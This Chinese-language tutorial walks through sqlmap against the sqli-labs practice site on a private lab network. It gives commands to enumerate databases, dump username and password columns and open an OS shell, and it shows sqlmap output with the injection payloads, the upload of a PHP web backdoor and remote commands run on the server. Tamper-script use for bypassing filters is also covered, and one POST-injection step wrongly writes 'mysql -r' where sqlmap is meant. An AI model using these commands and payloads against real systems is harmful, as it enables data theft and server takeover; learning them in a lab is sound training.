SQLmap的基本使用方法

其他注入工具

明小子

穿山甲

啊D

 

 

 

确定注入点后测试

sqlmap.py -u http://localhost/sqli/Less-1/?id=1

root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1

 

当前数据库

sqlmap.py -u http://localhost/sqli/Less-1/?id=1 --current-db

root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 --current-db

 

其他数据库

--dbs

root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 -dbs

 

数据库内表

-D security --tables

root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 -D security --tables

 

表内字段

-D security -T users --columns

root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 -D security -T users --columns

 

-D security -T users -C username,password --dump

root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 -D security -T users -C username,password --dump

 

注入木马

root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-7/?id=1 --os-shell

 

C:/phpstudy_pro/WWW

 

sqlmap.py -u http://localhost/sqli/Less-7/?id=1 --os-shell

 

root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 --os-shell

___

__H__

___ ___["]_____ ___ ___ {1.4.7#stable}

|_ -| . [,] | .'| . |

|___|_ [)]_|_|_|__,| _|

|_|V... |_| http://sqlmap.org

 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

 

[*] starting @ 22:51:21 /2020-12-28/

 

[22:51:21] [INFO] resuming back-end DBMS 'mysql'

[22:51:21] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: id (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1' AND 4954=4954 AND 'HBhg'='HBhg

 

Type: error-based

Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)

Payload: id=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716a717a71,(SELECT (ELT(1554=1554,1))),0x716b6b6a71,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'HyHQ'='HyHQ

 

Type: time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

Payload: id=1' AND (SELECT 5466 FROM (SELECT(SLEEP(5)))fXNK) AND 'oDCa'='oDCa

 

Type: UNION query

Title: Generic UNION query (NULL) - 3 columns

Payload: id=-8233' UNION ALL SELECT NULL,CONCAT(0x716a717a71,0x4666737259654f717656494b4e664d47434c55644a4e764d766d6a6c5a6f74726e71584f6c686358,0x716b6b6a71),NULL-- -

---

[22:51:22] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL >= 5.5

[22:51:22] [INFO] going to use a web backdoor for command prompt

[22:51:22] [INFO] fingerprinting the back-end DBMS operating system

[22:51:23] [INFO] the back-end DBMS operating system is Windows

which web application language does the web server support?

[1] ASP (default)

[2] ASPX

[3] JSP

[4] PHP

> 4

do you want sqlmap to further try to provoke the full path disclosure? [Y/n]

[22:51:28] [WARNING] unable to automatically retrieve the web server document root

what do you want to use for writable directory?

[1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)

[2] custom location(s)

[3] custom directory list file

[4] brute force search

> 2

please provide a comma separate list of absolute directory paths: C:\phpstudy_pro\WWW

[22:51:40] [WARNING] unable to automatically parse any web server path

[22:51:40] [INFO] trying to upload the file stager on 'C:/phpstudy_pro/WWW/' via LIMIT 'LINES TERMINATED BY' method

[22:51:41] [INFO] the file stager has been successfully uploaded on 'C:/phpstudy_pro/WWW/' - http://192.168.2.12:80/tmpucxne.php

[22:51:41] [INFO] the backdoor has been successfully uploaded on 'C:/phpstudy_pro/WWW/' - http://192.168.2.12:80/tmpbuonw.php

[22:51:41] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER

os-shell>

os-shell> ipconfig

do you want to retrieve the command standard output? [Y/n/a]

command standard output:

---

 

Windows IP 配置

 

 

以太网适配器 本地连接:

 

连接特定的 DNS 后缀 . . . . . . . : localdomain

本地链接 IPv6 地址. . . . . . . . : fe80::e488:cc63:a814:b8ab

IPv4 地址 . . . . . . . . . . . . : 192.168.2.12

子网掩码 . . . . . . . . . . . . : 255.255.255.0

默认网关. . . . . . . . . . . . . : 192.168.2.2

 

隧道适配器 isatap.localdomain:

 

媒体状态 . . . . . . . . . . . . : 媒体已断开

连接特定的 DNS 后缀 . . . . . . . : localdomain

---

 

 

宽字节注入

使用unmagicquotes方法进行宽字节绕过

sqlmap.py -u http://127.0.0.1/Less-32/?id=1 --tamper "unmagicquotes" --dbs

 

其他绕过脚本都存放在sqlmap的/tamper/目录下

例如kali：/usr/share/sqlmap/tamper/

 

脚本具体用途自行百度

https://www.cnblogs.com/mark0/p/12349551.html

 

 

抓取POST包，标记注入

1.burp抓取POST包导出

2.mysql -r [文件路径/文件名]

3.后续参数一样